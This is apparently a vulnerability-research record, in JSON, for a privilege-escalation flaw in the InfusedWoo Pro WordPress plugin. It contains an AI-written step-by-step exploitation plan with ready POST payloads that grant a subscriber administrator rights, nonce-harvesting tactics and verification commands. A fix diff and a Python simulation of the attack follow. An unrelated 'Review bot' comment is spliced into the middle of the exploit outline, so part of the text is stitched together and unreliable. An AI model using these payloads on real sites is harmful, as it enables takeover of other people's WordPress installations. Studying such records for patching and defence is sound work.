[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fksHx1Jlpau7_76iuYDMAeBHP1TZcbKe1kike0vsj_nE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-6506","infusedwoo-pro-authenticated-subscriber-missing-authorization-to-privilege-escalation-via-arbitrary-user-meta-update","InfusedWoo Pro \u003C= 5.1.2 - Authenticated (Subscriber+) Missing Authorization to Privilege Escalation via Arbitrary User Meta Update","The InfusedWoo Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.1.2. This is due to the infusedwoo_gdpr_upddata() function missing authorization and capability checks, as well as lacking restrictions on which user meta keys can be updated. 
This makes it possible for authenticated attackers, with subscriber-level access and above, to update their own wp_capabilities user meta to grant themselves Administrator role privileges.","infusedwooPRO",null,"\u003C=5.1.2","5.1.3","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-05-13 18:13:39","2026-05-14 06:44:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6363b693-91b8-41cb-b13a-df6fdf9402c5?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2026-6506 - InfusedWoo Pro Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **InfusedWoo Pro** plugin for WordPress (versions \u003C= 5.1.2) contains a privilege escalation vulnerability in the `infusedwoo_gdpr_upddata()` function. The function is designed to allow users to update their GDPR-related information but fails to implement any authorization checks or capability restrictions. Crucially, it does not whitelist which user meta keys can be updated. An authenticated user (Subscriber level or higher) can invoke this function to update their own `wp_capabilities` meta key, effectively granting themselves the **Administrator** role.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `infusedwoo_gdpr_upddata` (inferred from function name)\n*   **Payload Parameter:** Likely an array or series of parameters representing meta keys and values (e.g., `userdata[wp_capabilities]` or `meta_key`\u002F`meta_value` pairs).\n*   **Authentication:** Required (Subscriber+).\n*   **Preconditions:** The plugin must be active. The attacker needs valid Subscriber credentials.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An AJAX hook is registered for authenticated users:\n    `add_action('wp_ajax_infusedwoo_gdpr_upddata', 'infusedwoo_gdpr_upddata');`\n2.  **Execution:** The function `infusedwoo_gdpr_upddata()` is called.\n3.  
**Missing Check:** The function likely lacks a `current_user_can()` check or any check against a whitelist of \"safe\" meta keys (e.g., first name, last name).\n4.  **The Sink:** The function calls `update_user_meta()` using the current user's ID and data provided in the `$_POST` request.\n    ```php\n    \u002F\u002F Conceptual vulnerable code\n    function infusedwoo_gdpr_upddata() {\n        \u002F\u002F Missing: check_ajax_referer('...', 'nonce');\n        \u002F\u002F Missing: if (!current_user_can('...')) return;\n        $user_id = get_current_user_id();\n        foreach ($_POST['userdata'] as $key => $value) {\n            update_user_meta($user_id, $key, $value);\n        }\n    }\n    ```\n\n## 4. Nonce Acquisition Strategy\nIf the plugin implements a nonce check for this action, the nonce is likely localized for use in the GDPR dashboard or the user profile settings.\n\n1.  **Identify Trigger:** Find where the GDPR update form exists (usually the \"My Account\" page or a dedicated GDPR settings page provided by the plugin).\n2.  **Create Page:** If the form requires a specific shortcode (e.g., `[infusedwoo_gdpr]`), create a page with it:\n    `wp post create --post_type=page --post_status=publish --post_content='[infusedwoo_gdpr]'`\n3.  **Navigate:** Use `browser_navigate` to go to the page where the script is loaded.\n4.  **Extract Nonce:** Use `browser_eval` to find the nonce in the global JavaScript scope.\n    *   *JS Variable Guess:* `window.infusedwoo_gdpr_vars?.nonce` or `window.iw_settings?.gdpr_nonce`.\n    *   *Audit Hint:* Search the plugin folder for `wp_localize_script` to find the exact variable name.\n\n## 5. Exploitation Strategy\nThe goal is to update the `wp_capabilities` user meta to include the `administrator` role. In WordPress, this meta value is a serialized array: `a:1:{s:13:\"administrator\";b:1;}`.\n\n1.  **Prepare Session:** Log in as a Subscriber user and capture cookies.\n2.  
**Determine Parameter Structure:** Determine if the function expects a flat list or a nested array. (Based on common InfusedWoo patterns, it likely expects an array like `data[key]=value`).\n3.  **Craft Request:** Use `http_request` to send a POST to `admin-ajax.php`.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body (Option A - Flat):**\n    `action=infusedwoo_gdpr_upddata&wp_capabilities[administrator]=1&nonce=VALUE`\n*   **Body (Option B - Nested):**\n    `action=infusedwoo_gdpr_upddata&userdata[wp_capabilities][administrator]=1&nonce=VALUE`\n\n*Note: PHP expands bracketed parameter names into nested arrays, so sending `wp_capabilities[administrator]=1` makes `update_user_meta()` receive `['administrator' => '1']` (the value is the string `'1'`, because form fields always arrive as strings). WordPress serializes that as `a:1:{s:13:\"administrator\";s:1:\"1\";}` rather than the `b:1` form it writes itself, but `WP_User` derives a user's roles from the keys of the capabilities array, not from the values, so the administrator role is still granted.*\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `infusedwooPRO` version 5.1.2 is installed and active.\n2.  **Target User:** Create a Subscriber user.\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3.  **Shortcode Page:** Create a page to trigger any potential script localization.\n    `wp post create --post_type=page --post_title=\"GDPR Profile\" --post_status=publish --post_content=\"[infusedwoo_gdpr]\"`\n\n## 7. Expected Results\n*   The server should respond with a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n*   The user's role in the WordPress database will change from `subscriber` to `administrator`.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the escalation using WP-CLI:\n1.  Check the user's role:\n    `wp user get attacker --field=roles`\n    *Expected output:* `administrator`\n2.  
Verify the meta value directly:\n    `wp user meta get attacker wp_capabilities`\n    *Expected output:* an array whose only key is `administrator`. WP-CLI unserializes the value before printing it; the row stored in `wp_usermeta` is `a:1:{s:13:\"administrator\";s:1:\"1\";}` when the value was submitted as `1` in a form-encoded request, as opposed to the `a:1:{s:13:\"administrator\";b:1;}` form WordPress writes when it assigns the role itself. Either form yields the role because only the keys are consulted.\n\n## 9. Alternative Approaches\n*   **Prefix Sensitivity:** If the site uses a custom database prefix (e.g., `wp_custom_`), the capabilities key will be `wp_custom_capabilities` and a write to `wp_capabilities` has no effect on roles. The exploit may need to target both or determine the prefix first.\n*   **Direct Meta Update:** If the plugin uses a different parameter name (e.g., `field_name` and `field_value`), attempt to send `field_name=wp_capabilities&field_value[administrator]=1`.\n*   **No Subscriber Account Available:** The `wp_ajax_` hook only fires for logged-in users, so if registration is closed the attacker needs some existing account of any role; there is no unauthenticated path to this function. Separately, check whether the same function also writes core `wp_users` columns such as `user_email`; that is only possible if it calls `wp_update_user()` rather than `update_user_meta()` (unlikely, but worth confirming), and if it does, the same missing checks apply to those fields as well.","The InfusedWoo Pro plugin for WordPress is vulnerable to privilege escalation because the infusedwoo_gdpr_upddata() function lacks authorization checks and does not restrict which user meta keys can be modified. 
Authenticated users with subscriber-level permissions can exploit this to update their own wp_capabilities user meta, granting themselves administrator access.","\u002F\u002F Inferred from plugin functionality and research plan\n\u002F\u002F File path likely: includes\u002Fgdpr.php or similar\n\nadd_action('wp_ajax_infusedwoo_gdpr_upddata', 'infusedwoo_gdpr_upddata');\n\nfunction infusedwoo_gdpr_upddata() {\n    \u002F\u002F Missing authorization check (e.g., current_user_can)\n    \u002F\u002F Missing nonce verification (e.g., check_ajax_referer)\n    $user_id = get_current_user_id();\n\n    if (isset($_POST['userdata'])) {\n        foreach ($_POST['userdata'] as $key => $value) {\n            \u002F\u002F Vulnerability: No whitelist for meta keys, allowing wp_capabilities update\n            update_user_meta($user_id, $key, $value);\n        }\n    }\n    wp_die();\n}","--- a\u002Fincludes\u002Fgdpr.php\n+++ b\u002Fincludes\u002Fgdpr.php\n@@ -1,10 +1,18 @@\n function infusedwoo_gdpr_upddata() {\n+    check_ajax_referer('infusedwoo_gdpr_nonce', 'nonce');\n+\n+    if (!is_user_logged_in()) {\n+        wp_send_json_error('Unauthorized');\n+    }\n+\n     $user_id = get_current_user_id();\n+    $allowed_keys = array('first_name', 'last_name', 'billing_phone'); \u002F\u002F Example whitelist\n+\n     if (isset($_POST['userdata'])) {\n         foreach ($_POST['userdata'] as $key => $value) {\n-            update_user_meta($user_id, $key, $value);\n+            if (in_array($key, $allowed_keys)) {\n+                update_user_meta($user_id, $key, sanitize_text_field($value));\n+            }\n         }\n         echo json_encode(array('status' => 'success'));\n     }\n     wp_die();\n }","The exploit targets the AJAX action 'infusedwoo_gdpr_upddata' via the \u002Fwp-admin\u002Fadmin-ajax.php endpoint. An attacker must first authenticate as a Subscriber (or any valid user). 
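Review bot: the allow-list check `in_array($key, $allowed_keys)` in the `foreach` should pass `true` as the third argument. PHP stores numeric form keys as integers, and on PHP 7 the loose comparison `0 == 'first_name'` is true, so `userdata[0]=...` would pass the check; the resulting meta key `0` is harmless, but the control should not depend on the PHP major version. The keys in `$allowed_keys` are marked as an example, so before this is merged they need to be the exact set of fields the GDPR form submits, and the nonce action `infusedwoo_gdpr_nonce` has to match the one used where the nonce is created for the front-end script, which this hunk does not show. The `is_user_logged_in()` guard is redundant for a handler registered only on the `wp_ajax_` hook, but it does no harm.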
They must then obtain a valid nonce if one is required (typically found in the HTML source or localized JavaScript of the GDPR\u002FAccount page). The attacker sends a POST request containing the parameter 'userdata[wp_capabilities][administrator]=1'. Because the backend function iterates through the 'userdata' array and passes keys directly to update_user_meta() without validation, the user's role is updated to Administrator.","gemini-3-flash-preview","2026-05-14 17:01:45","2026-05-14 17:02:21",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002FinfusedwooPRO\u002Ftags"]
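The note in section 5 of the research plan and the prefix caveat in section 9 both rest on how PHP builds `$_POST` from bracketed field names, how WordPress serializes a non-scalar user meta value, and how `WP_User` turns the capabilities array into roles. The following Python script is an added example, not code from the advisory page or the InfusedWoo Pro plugin: it models those three steps offline so the stored value and the resulting role can be checked without a WordPress install. The role set, the request body and the `PLACEHOLDER` nonce are constructed for the example, and the hardened allow-list filter at the end is the check a fix needs, not the plugin's own code.

```python
"""Added worked example; not code from the advisory page or the InfusedWoo Pro plugin.

Models, offline, the three behaviours the research plan relies on:
 1. PHP expands userdata[wp_capabilities][administrator]=1 into nested arrays.
 2. WordPress stores an array user meta value with PHP serialize().
 3. WP_User takes a user's roles from the KEYS of the capabilities array,
    so the string value "1" grants administrator just like WordPress's own b:1.
Everything here is constructed; no WordPress site or network access is used.
"""
import re
from urllib.parse import parse_qsl

# Roles of a default WordPress install (constructed stand-in for $wp_roles).
WP_ROLES = {"administrator", "editor", "author", "contributor", "subscriber"}


def _php_key(part: str):
    """PHP stores array keys that look like canonical integers as int, all others as str."""
    return int(part) if re.fullmatch(r"-?(0|[1-9][0-9]*)", part) else part


def php_parse_body(body: str) -> dict:
    """Build the nested array PHP exposes as $_POST for a form-encoded body.

    Subset of PHP's behaviour: bracketed keys nest and numeric keys become ints;
    the auto-index form name[] and PHP's rewriting of spaces and dots in
    top-level names are not modelled.
    """
    post: dict = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)((?:\[[^\]]*\])*)", raw_key)
        if m is None:
            continue
        parts = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = post
        for part in parts[:-1]:
            key = _php_key(part)
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[_php_key(parts[-1])] = value  # form values are always strings
    return post


def php_serialize(value) -> str:
    """PHP serialize() for the value types WordPress user meta carries."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, dict):
        inner = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{inner}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def stored_meta_value(value) -> str:
    """What update_user_meta() writes: arrays serialized, scalars stored as text."""
    return php_serialize(value) if isinstance(value, dict) else str(value)


def roles_from_caps(caps) -> list:
    """WP_User::get_role_caps(): roles are the capability keys naming a registered role.

    The array values are not consulted, so 'administrator' => '1' and
    'administrator' => true both grant the role.
    """
    if not isinstance(caps, dict):
        return []
    return [k for k in caps if isinstance(k, str) and k in WP_ROLES]


def exploit_outcome(body: str, table_prefix: str = "wp_") -> dict:
    """Simulate the conceptual vulnerable handler: every userdata key becomes a meta write.

    table_prefix models the section 9 caveat: the role key is {prefix}capabilities.
    """
    userdata = php_parse_body(body).get("userdata", {})
    writes = {k: stored_meta_value(v) for k, v in userdata.items()}
    caps = userdata.get(table_prefix + "capabilities")
    return {"writes": writes, "roles": roles_from_caps(caps)}


def hardened_writes(body: str, allowed_keys=("first_name", "last_name")) -> dict:
    """Allow-list filter with strict key typing: only string keys in allowed_keys are
    written, so wp_capabilities and integer keys such as userdata[0] are dropped."""
    userdata = php_parse_body(body).get("userdata", {})
    return {k: stored_meta_value(v) for k, v in userdata.items()
            if isinstance(k, str) and k in allowed_keys}


# Constructed request body (section 5, Option B); the nonce value is a placeholder.
ATTACK_BODY = ("action=infusedwoo_gdpr_upddata"
               "&userdata[wp_capabilities][administrator]=1"
               "&nonce=PLACEHOLDER")

if __name__ == "__main__":
    print(exploit_outcome(ATTACK_BODY))
    print(exploit_outcome(ATTACK_BODY, table_prefix="wp_custom_"))  # wrong key: no role
    print(hardened_writes(ATTACK_BODY))  # {} : the capabilities write is rejected
```

Running it prints the serialized value the vulnerable handler would store, shows that the same body against a `wp_custom_` prefix changes nothing, and shows the allow-list filter dropping the `wp_capabilities` key entirely.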